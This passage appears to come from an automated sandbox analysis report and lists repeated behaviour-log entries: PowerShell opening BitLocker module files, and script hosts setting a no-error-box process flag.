    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
